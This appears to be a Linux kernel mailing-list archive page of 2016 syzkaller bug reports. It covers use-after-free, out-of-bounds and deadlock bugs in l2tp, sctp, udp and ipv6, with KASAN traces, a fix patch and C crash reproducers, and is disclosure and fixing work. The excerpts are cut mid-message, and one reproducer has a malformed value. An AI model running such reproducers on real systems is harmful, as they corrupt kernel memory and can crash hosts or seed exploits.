Re: net/l2tp:BUG: KASAN: use-after-free in l2tp_ip6_close
Hello Guillaume, On 2016/11/17 5:07, Guillaume Nault wrote: > On Wed, Nov 16, 2016 at 11:08:23AM -0800, Cong Wang wrote: >> On Wed, Nov 16, 2016 at 8:30 AM, Guillaume Nault >> wrote: >>> diff --git a/net/l2tp/l2tp_ip.c b/net/l2tp/l2tp_ip.c >>> index fce25af..982f6c4 100644 >>> --- a/net/l2tp/l2tp_ip.c >>> +++ b/net/l2tp/l2tp_ip.c >>> @@ -251,8 +251,6 @@ static int l2tp_ip_bind(struct sock *sk, struct >>> sockaddr *uaddr, int addr_len) >>> int ret; >>> int chk_addr_ret; >>> >>> - if (!sock_flag(sk, SOCK_ZAPPED)) >>> - return -EINVAL; >>> if (addr_len < sizeof(struct sockaddr_l2tpip)) >>> return -EINVAL; >>> if (addr->l2tp_family != AF_INET) >>> @@ -267,6 +265,9 @@ static int l2tp_ip_bind(struct sock *sk, struct >>> sockaddr *uaddr, int addr_len) >>> read_unlock_bh(&l2tp_ip_lock); >>> >>> lock_sock(sk); >>> + if (!sock_flag(sk, SOCK_ZAPPED)) >>> + goto out; >>> + >>> if (sk->sk_state != TCP_CLOSE || addr_len < sizeof(struct >>> sockaddr_l2tpip)) >>> goto out; >>> >>> diff --git a/net/l2tp/l2tp_ip6.c b/net/l2tp/l2tp_ip6.c >>> index ad3468c..9978d01 100644 >>> --- a/net/l2tp/l2tp_ip6.c >>> +++ b/net/l2tp/l2tp_ip6.c >>> @@ -269,8 +269,6 @@ static int l2tp_ip6_bind(struct sock *sk, struct >>> sockaddr *uaddr, int addr_len) >>> int addr_type; >>> int err; >>> >>> - if (!sock_flag(sk, SOCK_ZAPPED)) >>> - return -EINVAL; >>> if (addr->l2tp_family != AF_INET6) >>> return -EINVAL; >>> if (addr_len < sizeof(*addr)) >>> @@ -296,6 +294,9 @@ static int l2tp_ip6_bind(struct sock *sk, struct >>> sockaddr *uaddr, int addr_len) >>> lock_sock(sk); >>> >>> err = -EINVAL; >>> + if (!sock_flag(sk, SOCK_ZAPPED)) >>> + goto out_unlock; >>> + >>> if (sk->sk_state != TCP_CLOSE) >>> goto out_unlock; >> >> >> Makes sense, it should prevent a concurrent caller adding the socket >> into bind table >> twice after passing __l2tp_ip_bind_lookup() check. > > Yes, and the __l2tp_ip_bind_lookup() call is also racy. But, by > properly checking the SOCK_ZAPPED flag, we probably can remove this > call entirely. > > For now, I only wanted to make sure the issue was well identified. I'll > submit a more complete patch for net (with protected SOCK_ZAPPED check > in l2tp_ip_connect() too). > The patch fixes the issues both for l2tp_ip and l2tp_ip6 Tested-by: Baozeng Ding Best Regards, Baozeng Ding
Re: net/sctp: BUG: KASAN: stack-out-of-bounds in memcmp
On 2016/11/10 13:48, Xin Long wrote: > On Sat, Oct 15, 2016 at 4:28 PM, Baozeng Ding wrote: >> Hello Xin Long, >> >> On 2016/10/14 19:13, Xin Long wrote: >>> On Sat, Aug 20, 2016 at 3:51 PM, Baozeng Ding wrote: >>>> Hello all, >>>> The following program triggers stack-out-of-bounds in memcmp. The kernel >>>> version is 4.8.0-rc1+ (on Aug 13 commit >>>> 118253a593bd1c57de2d1193df1ccffe1abe745b). Thanks. >>> ... >>>> >>>> #define _GNU_SOURCE >>>> #include >>>> #include >>>> #include >>>> #include >>>> #include >>>> #include >>>> #include >>>> #include >>>> >>>> int main() >>>> { >>>> int fd; >>>> mmap((void *)0x2000ul, 0xff2000ul, 0x3ul, 0x32ul, -1, 0x0ul); >>>> fd = socket(AF_INET6, SOCK_STREAM, IPPROTO_SCTP); >>>> memcpy((void*)0x20f82f80, >>>> "\x0a\x00\xab\x12\x72\xd4\x19\x9a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x85\xda\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", >>>> 128); >>>> bind(fd, (struct sockaddr*)0x20f82f80ul, 0x80ul); >>>> *(uint64_t*)0x202e1fc8 = (uint64_t)0x20f77f80; >>>> *(uint32_t*)0x202e1fd0 = (uint32_t)0x80; >>>> *(uint64_t*)0x202e1fd8 = (uint64_t)0x20f7dfe0; >>>> *(uint64_t*)0x202e1fe0 = (uint64_t)0x2; >>>> *(uint64_t*)0x202e1fe8 = (uint64_t)0x20f77000; >>>> *(uint64_t*)0x202e1ff0 = (uint64_t)0x3; >>>> *(uint32_t*)0x202e1ff8 = (uint32_t)0x80; >>>> memcpy((void*)0x20f77f80, >>>> "\x0a\x00\xab\x12\xb0\xb3\x20\x7b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc2\xc2\x0b\xb2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", >>>> 128); >>>> *(uint64_t*)0x20f7dfe0 = (uint64_t)0x20f77fc5; >>>> *(uint64_t*)0x20f7dfe8 = (uint64_t)0x3b; >>>> *(uint64_t*)0x20f7dff0 = (uint64_t)0x20f77fac; >>>> *(uint64_t*)0x20f7dff8 = (uint64_t)0x54; >>>> memcpy((void*)0x20f77fc5, >>>> "\xa5\x7d\xf3\xc4\xfe\xd3\xfd\x44\x63\x00\x8c\x1e\x4c\x2e\x8d\x8d\x9a\x9c\x9c\x9d\x5b\x7c\xe1\x06\xf7\x15\x16\xed\x68\xd1\xfc\xf4\xa4\x3a\xe4\x69\x51\x16\x74\xf4\x1a\xcf\x0e\x99\xc3\xa3\x87\xe7\x81\x6c\x10\x78\x75\x17\x69\x9d\x11\x0c\xc7", >>>> 59); >>>> memcpy((void*)0x20f77fac, >>>> "\x86\x08\x89\x3c\xf3\x58\xea\xe7\x64\x6a\xfb\xb5\xe8\xdd\x5f\x69\xa5\xd4\xdc\xd9\xe7\x71\x95\x07\x78\x7b\x21\xda\x43\x9c\x62\x4d\xca\x64\xb5\x6e\x96\x55\xe9\x58\x76\x66\x1d\xb9\x7b\xe6\x20\xc1\xa9\xed\x70\xc1\x2b\x7c\x86\x8c\xba\x28\xb3\x2c\xb9\x64\xb7\x84\x65\x0d\x7f\xa6\x98\x6f\x49\xcb\x35\xad\x5a\xdf\x13\x75\x99\x57\x7e\xbb\x38\x89", >>>> 84); >>>> *(uint64_t*)0x20f77000 = (uint64_t)0x15; >>>> *(uint32_t*)0x20f77008 = (uint32_t)0x1; >>>> *(uint32_t*)0x20f7700c = (uint32_t)0xfffe; >>>> *(uint8_t*)0x20f77010 = (uint8_t)0xbb; >>>> *(uint8_t*)0x20f77011 = (uint8_t)0x2; >>>> *(uint8_t*)0x20f77012 = (uint8_t)0x5; >>>> *(uint8_t*)0x20f77013 = (uint8_t)0x2; >>>> *(uint8_t*)0x20f77014 = (uint8_t)0x8000; >>>> *(uint64_t*)0x20f77015 = (uint64_t)0x10; >>>> *(uint32_t*)0x20f7701d = (uint32_t)0x; >>>> *(uint32_t*)0x20f77021 = (uint32_t)0x1; >>>> *(uint64_t*)0x20f77025 = (uint64_t)0x13; >>>> *(uint32_t*)0x20f7702d = (uint32_t)0x6; >>>> *(uint32_t*)0x20f77031 = (uint32_t)0xfe00; >>>> *(uint8_t*)0x20f77035 = (uint8_t)0x8000; >>>> *(uint8_t*)0x20f77036 = (uint8_t)0xfff8; >>>&g
Re: BUG: KASAN: use-after-free in udp_lib_get_port
fb fb fb fb fb fb fb 88002f163d00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ====== Best Regards, Baozeng Ding On 2016/10/17 3:53, Cong Wang wrote: > On Sun, Oct 16, 2016 at 6:46 AM, Baozeng Ding wrote: >> Hello all, >> While running syzkaller fuzzer I have got the following use-after-free >> bug in udp_lib_get_port. The kernel version is 4.8.0+ (on Oct 7 commit >> d1f5323370fceaed43a7ee38f4c7bfc7e70f28d0). Unfortunately I failed to find a >> reproducer for it. >> >> BUG: KASAN: use-after-free in udp_lib_get_port+0x1573/0x1860 at addr >> 88000804cb60 >> Write of size 8 by task syz-executor/31190 >> CPU: 0 PID: 31190 Comm: syz-executor Not tainted 4.8.0+ #39 >> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS >> rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 >> 880015ac7a48 829f835b 880032b531c0 88000804cb40 >> 88000804d250 880017415a4a 880015ac7a70 8174d3cc >> 880015ac7b00 88000804cb00 880032b531c0 880015ac7af0 >> Call Trace: >> [] dump_stack+0xb3/0x118 lib/dump_stack.c:15 >> [] kasan_object_err+0x1c/0x70 mm/kasan/report.c:156 >> [< inline >] print_address_description mm/kasan/report.c:194 >> [] kasan_report_error+0x1f6/0x4d0 mm/kasan/report.c:283 >> [< inline >] kasan_report mm/kasan/report.c:303 >> [] __asan_report_store8_noabort+0x3e/0x40 >> mm/kasan/report.c:329 >> [< inline >] hlist_add_head_rcu ./include/linux/rculist.h:487 >> [] udp_lib_get_port+0x1573/0x1860 net/ipv4/udp.c:345 >> [] udp_v6_get_port+0xa7/0xd0 net/ipv6/udp.c:106 >> [] inet6_bind+0x89c/0xfb0 net/ipv6/af_inet6.c:384 >> [] SYSC_bind+0x1ea/0x250 net/socket.c:1367 >> [] SyS_bind+0x24/0x30 net/socket.c:1353 >> [] entry_SYSCALL_64_fastpath+0x23/0xc6 > > > We should have a reference to this sock via fd and its sock->sk too, > so I fail to see why it could be freed while we holding this reference. > Maybe a VFS layer bug? > >> Object at 88000804cb40, in cache UDPv6 size: 1496 >> Allocated: >> PID = 30789 >> [ 378.305168] [] save_stack_trace+0x16/0x20 >> [ 378.305168] [] save_stack+0x46/0xd0 >> [ 378.305168] [] kasan_kmalloc+0xad/0xe0 >> [ 378.305168] [] kasan_slab_alloc+0x12/0x20 >> [ 378.305168] [< inline >] slab_post_alloc_hook mm/slab.h:417 >> [ 378.305168] [< inline >] slab_alloc_node mm/slub.c:2708 >> [ 378.305168] [< inline >] slab_alloc mm/slub.c:2716 >> [ 378.305168] [] kmem_cache_alloc+0xc8/0x2b0 >> mm/slub.c:2721 >> [ 378.305168] [] sk_prot_alloc+0x69/0x2b0 >> net/core/sock.c:1326 >> [ 378.305168] [] sk_alloc+0x38/0xae0 net/core/sock.c:1388 >> [ 378.305168] [] inet6_create+0x2d7/0x1000 >> net/ipv6/af_inet6.c:182 >> [ 378.305168] [] __sock_create+0x37b/0x640 >> net/socket.c:1153 >> [ 378.305168] [< inline >] sock_create net/socket.c:1193 >> [ 378.305168] [< inline >] SYSC_socket net/socket.c:1223 >> [ 378.305168] [] SyS_socket+0xef/0x1b0 net/socket.c:1203 >> [ 378.305168] [] entry_SYSCALL_64_fastpath+0x23/0xc6 >> Freed: >> PID = 30789 >> [ 378.305168] [] save_stack_trace+0x16/0x20 >> [ 378.305168] [] save_stack+0x46/0xd0 >> [ 378.305168] [] kasan_slab_free+0x71/0xb0 >> [ 378.305168] [< inline >] slab_free_hook mm/slub.c:1352 >> [ 378.305168] [< inline >] slab_free_freelist_hook mm/slub.c:1374 >> [ 378.305168] [< inline >] slab_free mm/slub.c:2951 >> [ 378.305168] [] kmem_cache_free+0xc8/0x330 >> mm/slub.c:2973 >> [ 378.305168] [< inline >] sk_prot_free net/core/sock.c:1369 >> [ 378.305168] [] __sk_destruct+0x32b/0x4f0 >> net/core/sock.c:1444 >> [ 378.305168] [] sk_destruct+0x44/0x80 >> net/core/sock.c:1452 >> [ 378.305168] [] __sk_free+0x53/0x220 >> net/core/sock.c:1460 >> [ 378.305168] [] sk_free+0x23/0x30 net/core/sock.c:1471 >> [ 378.305168] [] sk_common_release+0x28c/0x3e0 >> ./include/net/sock.h:1589 >> [ 378.305168] [] udp_lib_close+0x15/0x20 >> ./include/net/udp.h:203 >> [ 378.305168] [] inet_release+0xed/0x1c0 >> net/ipv4/af_inet.c:415 >> [ 378.305168] [] inet6_release+0x50/0x70 >> net/ipv6/af_inet6.c:422 >> [ 378.305168] [] sock_release+0x8d/0x1d0 net/socket.c:570 >> [ 378.305168] [] sock_close+0x16/0x20 net/socket.c:1017 >> [ 378.305168] [] __fput+0x28c/0x780 fs/file_table.c:208 >> [ 378.305168] [
Re: net/l2tp:BUG: KASAN: use-after-free in l2tp_ip6_close
This use-after-free seems to be triggered by some race. I use stress tool for this: https://github.com/golang/tools/blob/master/cmd/stress/stress.go If you have Go toolchain installed, then the following will do: $ go get golang.org/x/tools/cmd/stress $ stress ./a.out = #include #include #include #include #include #include int fd; struct sockaddr_l2tpip sock_addr = { .l2tp_family = AF_INET, .l2tp_unused = 0, .l2tp_addr = 0, .l2tp_conn_id = 8, .__pad = 0 }; void *thr(void *arg) { switch ((long)arg) { case 0: fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_L2TP); break; case 1: bind(fd, (struct sockaddr*) &sock_addr, 0x10ul); break; case 2: bind(fd, (struct sockaddr*)&sock_addr, 0x10ul); break; case 3: connect(fd, (struct sockaddr*)&sock_addr, 0x10ul); break; } return 0; } int main() { long i; pthread_t th[4]; int n; for (i = 0; i < 4; i++) { pthread_create(&th[i], 0, thr, (void*)i); usleep(1); } for (i = 0; i < 4; i++) { pthread_create(&th[i], 0, thr, (void*)i); if (i%2==0) usleep(1); } usleep(10); return 0; } On 2016/10/17 3:50, Cong Wang wrote: > On Sun, Oct 16, 2016 at 8:07 AM, Baozeng Ding wrote: >> Hello, >> While running syzkaller fuzzer I have got the following use-after-free >> bug in l2tp_ip6_close. The kernel version is 4.8.0+ (on Oct 7 commit >> d1f5323370fceaed43a7ee38f4c7bfc7e70f28d0). >> >> BUG: KASAN: use-after-free in l2tp_ip6_close+0x22e/0x290 at addr >> 8800081b0ed8 >> Write of size 8 by task syz-executor/10987 >> CPU: 0 PID: 10987 Comm: syz-executor Not tainted 4.8.0+ #39 >> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS >> rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 >> 880031d97838 829f835b 88001b5a1640 8800081b0ec0 >> 8800081b15a0 8800081b6d20 880031d97860 8174d3cc >> 880031d978f0 8800081b0e80 88001b5a1640 880031d978e0 >> Call Trace: >> [] dump_stack+0xb3/0x118 lib/dump_stack.c:15 >> [] kasan_object_err+0x1c/0x70 mm/kasan/report.c:156 >> [< inline >] print_address_description mm/kasan/report.c:194 >> [] kasan_report_error+0x1f6/0x4d0 mm/kasan/report.c:283 >> [< inline >] kasan_report mm/kasan/report.c:303 >> [] __asan_report_store8_noabort+0x3e/0x40 >> mm/kasan/report.c:329 >> [< inline >] __write_once_size ./include/linux/compiler.h:249 >> [< inline >] __hlist_del ./include/linux/list.h:622 >> [< inline >] hlist_del_init ./include/linux/list.h:637 >> [] l2tp_ip6_close+0x22e/0x290 net/l2tp/l2tp_ip6.c:239 > > > This one looks pretty interesting, how the hell could we call fput() twice > on the same fd... > > >> [] inet_release+0xed/0x1c0 net/ipv4/af_inet.c:415 >> [] inet6_release+0x50/0x70 net/ipv6/af_inet6.c:422 >> [] sock_release+0x8d/0x1d0 net/socket.c:570 >> [] sock_close+0x16/0x20 net/socket.c:1017 >> [] __fput+0x28c/0x780 fs/file_table.c:208 >> [] fput+0x15/0x20 fs/file_table.c:244 >> [] task_work_run+0xf9/0x170 >> [] do_exit+0x85e/0x2a00 >> [] do_group_exit+0x108/0x330 >> [] get_signal+0x617/0x17a0 kernel/signal.c:2307 >> [] do_signal+0x7f/0x18f0 >> [] exit_to_usermode_loop+0xbf/0x150 >> arch/x86/entry/common.c:156 >> [< inline >] prepare_exit_to_usermode arch/x86/entry/common.c:190 >> [] syscall_return_slowpath+0x1a0/0x1e0 >> arch/x86/entry/common.c:259 >> [] entry_SYSCALL_64_fastpath+0xc4/0xc6 >> Object at 8800081b0ec0, in cache L2TP/IPv6 size: 1448 >> Allocated: >> PID = 10987 >> [ 1116.897025] [] save_stack_trace+0x16/0x20 >> [ 1116.897025] [] save_stack+0x46/0xd0 >> [ 1116.897025] [] kasan_kmalloc+0xad/0xe0 >> [ 1116.897025] [] kasan_slab_alloc+0x12/0x20 >> [ 1116.897025] [< inline >] slab_post_alloc_hook mm/slab.h:417 >> [ 1116.897025] [< inline >] slab_alloc_node mm/slub.c:2708 >> [ 1116.897025] [< inline >] slab_alloc mm/slub.c:2716 >> [ 1116.897025] [] kmem_cache_alloc+0xc8/0x2b0 >> mm/slub.c:2721 >> [ 1116.897025] [] sk_prot_alloc+0x69/0x2b0 >> net/core/sock.c:1326 >> [ 1116.897025] [] sk_alloc+0x38/0xae0 net/core/sock.c:1388 >> [ 1116.897025]
Re: net/ipv6: potential deadlock in do_ipv6_setsockopt
It fixes the issue for me. Tested-by: Baozeng Ding On 2016/10/17 17:54, Baozeng Ding wrote: > Applied the patch to my test tree. I will tell you the result a few days > later. Thank you. > > On 2016/10/17 2:50, Cong Wang wrote: >> On Sun, Oct 16, 2016 at 6:34 AM, Baozeng Ding wrote: >>> Possible unsafe locking scenario: >>> >>>CPU0CPU1 >>> >>> lock([ 165.136033] sk_lock-AF_INET6 >>> ); >>>lock([ 165.136033] rtnl_mutex >>> ); >>>lock([ 165.136033] sk_lock-AF_INET6 >>> ); >>> lock([ 165.136033] rtnl_mutex >>> ); >>> >>> *** DEADLOCK *** >> >> This is caused by the conditional rtnl locking in do_ipv6_setsockopt(). >> It looks like we miss the case of IPV6_ADDRFORM. >> >> Please try the attached patch. >>
Re: net/ipv6: potential deadlock in do_ipv6_setsockopt
It fixes the issue for me. Tested-by: Baozeng Ding On 2016/10/17 17:54, Baozeng Ding wrote: > Applied the patch to my test tree. I will tell you the result a few days > later. Thank you. > > On 2016/10/17 2:50, Cong Wang wrote: >> On Sun, Oct 16, 2016 at 6:34 AM, Baozeng Ding wrote: >>> Possible unsafe locking scenario: >>> >>>CPU0CPU1 >>> >>> lock([ 165.136033] sk_lock-AF_INET6 >>> ); >>>lock([ 165.136033] rtnl_mutex >>> ); >>>lock([ 165.136033] sk_lock-AF_INET6 >>> ); >>> lock([ 165.136033] rtnl_mutex >>> ); >>> >>> *** DEADLOCK *** >> >> This is caused by the conditional rtnl locking in do_ipv6_setsockopt(). >> It looks like we miss the case of IPV6_ADDRFORM. >> >> Please try the attached patch. >>
Re: BUG: KASAN: use-after-free in udp_lib_get_port
8 by task syz-executor/13522 CPU: 1 PID: 13522 Comm: syz-executor Tainted: GB 4.8.0+ #41 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 88002e4e77e0 829f835b 88002f488b40 88002f163c40 88002f164350 880031781540 88002e4e7808 8174d3cc 88002e4e7898 88002f163c00 88002f488b40 88002e4e7888 Call Trace: [] dump_stack+0xb3/0x118 /lib/dump_stack.c:15 [] kasan_object_err+0x1c/0x70 /mm/kasan/report.c:156 [< inline >] print_address_description /mm/kasan/report.c:194 [] kasan_report_error+0x1f6/0x4d0 /mm/kasan/report.c:283 [< inline >] kasan_report /mm/kasan/report.c:303 [] __asan_report_store8_noabort+0x3e/0x40 /mm/kasan/report.c:329 [< inline >] hlist_del_init_rcu /./include/linux/list.h:624 [] udp_lib_unhash+0x593/0x660 /net/ipv4/udp.c:1391 [] sk_common_release+0xbd/0x3e0 /net/core/sock.c:2719 [] udp_lib_close+0x15/0x20 /./include/net/udp.h:203 [] inet_release+0xed/0x1c0 /net/ipv4/af_inet.c:415 [] sock_release+0x8d/0x1d0 /net/socket.c:570 [] sock_close+0x16/0x20 /net/socket.c:1017 [] __fput+0x28c/0x780 /fs/file_table.c:208 [] fput+0x15/0x20 /fs/file_table.c:244 [] task_work_run+0xf9/0x170 [] do_exit+0x85e/0x2a00 [] do_group_exit+0x108/0x330 [] get_signal+0x617/0x17a0 /kernel/signal.c:2307 [] do_signal+0x7f/0x18f0 [] exit_to_usermode_loop+0xbf/0x150 /arch/x86/entry/common.c:156 [< inline >] prepare_exit_to_usermode /arch/x86/entry/common.c:190 [] syscall_return_slowpath+0x1a0/0x1e0 /arch/x86/entry/common.c:259 [] entry_SYSCALL_64_fastpath+0xc4/0xc6 Object at 88002f163c40, in cache UDPv6 size: 1496 Allocated: PID = 13255 [ 1773.617936] [] save_stack_trace+0x16/0x20 [ 1773.617936] [] save_stack+0x46/0xd0 [ 1773.617936] [] kasan_kmalloc+0xad/0xe0 [ 1773.617936] [] kasan_slab_alloc+0x12/0x20 [ 1773.617936] [< inline >] slab_post_alloc_hook /mm/slab.h:417 [ 1773.617936] [< inline >] slab_alloc_node /mm/slub.c:2708 [ 1773.617936] [< inline >] slab_alloc /mm/slub.c:2716 [ 1773.617936] [] kmem_cache_alloc+0xc8/0x2b0 /mm/slub.c:2721 [ 1773.617936] [] sk_prot_alloc+0x69/0x2b0 /net/core/sock.c:1326 [ 1773.617936] [] sk_alloc+0x38/0xae0 /net/core/sock.c:1388 [ 1773.617936] [] inet6_create+0x2d7/0x1000 /net/ipv6/af_inet6.c:182 [ 1773.617936] [] __sock_create+0x37b/0x640 /net/socket.c:1153 [ 1773.617936] [< inline >] sock_create /net/socket.c:1193 [ 1773.617936] [< inline >] SYSC_socket /net/socket.c:1223 [ 1773.617936] [] SyS_socket+0xef/0x1b0 /net/socket.c:1203 [ 1773.617936] [] entry_SYSCALL_64_fastpath+0x23/0xc6 Freed: PID = 13261 [ 1773.617936] [] save_stack_trace+0x16/0x20 [ 1773.617936] [] save_stack+0x46/0xd0 [ 1773.617936] [] kasan_slab_free+0x71/0xb0 [ 1773.617936] [< inline >] slab_free_hook /mm/slub.c:1352 [ 1773.617936] [< inline >] slab_free_freelist_hook /mm/slub.c:1374 [ 1773.617936] [< inline >] slab_free /mm/slub.c:2951 [ 1773.617936] [] kmem_cache_free+0xc8/0x330 /mm/slub.c:2973 [ 1773.617936] [< inline >] sk_prot_free /net/core/sock.c:1369 [ 1773.617936] [] __sk_destruct+0x32b/0x4f0 /net/core/sock.c:1444 [ 1773.617936] [] sk_destruct+0x44/0x80 /net/core/sock.c:1452 [ 1773.617936] [] __sk_free+0x53/0x220 /net/core/sock.c:1460 [ 1773.617936] [] sk_free+0x23/0x30 /net/core/sock.c:1471 [ 1773.617936] [] sk_common_release+0x28c/0x3e0 /./include/net/sock.h:1589 [ 1773.617936] [] udp_lib_close+0x15/0x20 /./include/net/udp.h:203 [ 1773.617936] [] inet_release+0xed/0x1c0 /net/ipv4/af_inet.c:415 [ 1773.617936] [] inet6_release+0x5a/0x80 /net/ipv6/af_inet6.c:424 [ 1773.617936] [] sock_release+0x8d/0x1d0 /net/socket.c:570 [ 1773.617936] [] sock_close+0x16/0x20 /net/socket.c:1017 [ 1773.617936] [] __fput+0x28c/0x780 /fs/file_table.c:208 [ 1773.617936] [] fput+0x15/0x20 /fs/file_table.c:244 [ 1773.617936] [] task_work_run+0xf9/0x170 [ 1773.617936] [] do_exit+0x85e/0x2a00 [ 1773.617936] [] do_group_exit+0x108/0x330 [ 1773.617936] [] get_signal+0x617/0x17a0 /kernel/signal.c:2307 [ 1773.617936] [] do_signal+0x7f/0x18f0 [ 1773.617936] [] exit_to_usermode_loop+0xbf/0x150 /arch/x86/entry/common.c:156 [ 1773.617936] [< inline >] prepare_exit_to_usermode /arch/x86/entry/common.c:190 [ 1773.617936] [] syscall_return_slowpath+0x1a0/0x1e0 /arch/x86/entry/common.c:259 [ 1773.617936] [] entry_SYSCALL_64_fastpath+0xc4/0xc6 Memory state around the buggy address: 88002f163b00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 88002f163b80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc >88002f163c00: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb ^ 88002f163c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 88002f163d00: fb fb fb fb fb fb fb fb fb fb
Re: net/ipv6: potential deadlock in do_ipv6_setsockopt
Applied the patch to my test tree. I will tell you the result a few days later. Thank you. On 2016/10/17 2:50, Cong Wang wrote: > On Sun, Oct 16, 2016 at 6:34 AM, Baozeng Ding wrote: >> Possible unsafe locking scenario: >> >>CPU0CPU1 >> >> lock([ 165.136033] sk_lock-AF_INET6 >> ); >>lock([ 165.136033] rtnl_mutex >> ); >>lock([ 165.136033] sk_lock-AF_INET6 >> ); >> lock([ 165.136033] rtnl_mutex >> ); >> >> *** DEADLOCK *** > > This is caused by the conditional rtnl locking in do_ipv6_setsockopt(). > It looks like we miss the case of IPV6_ADDRFORM. > > Please try the attached patch. >
net/l2tp:BUG: KASAN: use-after-free in l2tp_ip6_close
fc fc fc fc fc fc fc fc fc fc 8800081b0e00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc >8800081b0e80: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb ^ 8800081b0f00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 8800081b0f80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb == Best Regards, Baozeng Ding
BUG: KASAN: use-after-free in udp_lib_rehash
Hello all, While running syzkaller fuzzer I have got the following use-after-free bug in udp_lib_rehash. The kernel version is 4.8.0+ (on Oct 7 commit d1f5323370fceaed43a7ee38f4c7bfc7e70f28d0). Unfortunately I failed to find a reproducer for it. BUG: KASAN: use-after-free in udp_lib_rehash+0x634/0x640 at addr 88002f3fe1e0 Write of size 8 by task syz-executor/11156 CPU: 3 PID: 11156 Comm: syz-executor Not tainted 4.8.0+ #39 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 88001acb7b58 829f835b 880034acd900 88002f3fe1c0 88002f3fe8d0 c9230810 88001acb7b80 8174d3cc 88001acb7c10 88002f3fe180 880034acd900 88001acb7c00 Call Trace: [] dump_stack+0xb3/0x118 lib/dump_stack.c:15 [] kasan_object_err+0x1c/0x70 mm/kasan/report.c:156 [< inline >] print_address_description mm/kasan/report.c:194 [] kasan_report_error+0x1f6/0x4d0 mm/kasan/report.c:283 [< inline >] kasan_report mm/kasan/report.c:303 [] __asan_report_store8_noabort+0x3e/0x40 mm/kasan/report.c:329 [< inline >] hlist_add_head_rcu ./include/linux/rculist.h:487 [] udp_lib_rehash+0x634/0x640 net/ipv4/udp.c:1429 [] udp_v6_rehash+0x72/0xa0 net/ipv6/udp.c:115 [] ip6_datagram_connect+0x786/0xc40 [] inet_dgram_connect+0x112/0x1f0 net/ipv4/af_inet.c:530 [] SYSC_connect+0x23e/0x2e0 net/socket.c:1533 [] SyS_connect+0x24/0x30 net/socket.c:1514 [] entry_SYSCALL_64_fastpath+0x23/0xc6 Object at 88002f3fe1c0, in cache UDPv6 size: 1496 Allocated: PID = 11149 [ 1921.980207] [] save_stack_trace+0x16/0x20 [ 1921.980207] [] save_stack+0x46/0xd0 [ 1921.980207] [] kasan_kmalloc+0xad/0xe0 [ 1921.980207] [] kasan_slab_alloc+0x12/0x20 [ 1921.980207] [< inline >] slab_post_alloc_hook mm/slab.h:417 [ 1921.980207] [< inline >] slab_alloc_node mm/slub.c:2708 [ 1921.980207] [< inline >] slab_alloc mm/slub.c:2716 [ 1921.980207] [] kmem_cache_alloc+0xc8/0x2b0 mm/slub.c:2721 [ 1921.980207] [] sk_prot_alloc+0x69/0x2b0 net/core/sock.c:1326 [ 1921.980207] [] sk_alloc+0x38/0xae0 net/core/sock.c:1388 [ 1921.980207] [] inet6_create+0x2d7/0x1000 net/ipv6/af_inet6.c:182 [ 1921.980207] [] __sock_create+0x37b/0x640 net/socket.c:1153 [ 1921.980207] [< inline >] sock_create net/socket.c:1193 [ 1921.980207] [< inline >] SYSC_socket net/socket.c:1223 [ 1921.980207] [] SyS_socket+0xef/0x1b0 net/socket.c:1203 [ 1921.980207] [] entry_SYSCALL_64_fastpath+0x23/0xc6 Freed: PID = 11157 [ 1921.980207] [] save_stack_trace+0x16/0x20 [ 1921.980207] [] save_stack+0x46/0xd0 [ 1921.980207] [] kasan_slab_free+0x71/0xb0 [ 1921.980207] [< inline >] slab_free_hook mm/slub.c:1352 [ 1921.980207] [< inline >] slab_free_freelist_hook mm/slub.c:1374 [ 1921.980207] [< inline >] slab_free mm/slub.c:2951 [ 1921.980207] [] kmem_cache_free+0xc8/0x330 mm/slub.c:2973 [ 1921.980207] [< inline >] sk_prot_free net/core/sock.c:1369 [ 1921.980207] [] __sk_destruct+0x32b/0x4f0 net/core/sock.c:1444 [ 1921.980207] [] sk_destruct+0x44/0x80 net/core/sock.c:1452 [ 1921.980207] [] __sk_free+0x53/0x220 net/core/sock.c:1460 [ 1921.980207] [] sk_free+0x23/0x30 net/core/sock.c:1471 [ 1921.980207] [] sk_common_release+0x28c/0x3e0 ./include/net/sock.h:1589 [ 1921.980207] [] udp_lib_close+0x15/0x20 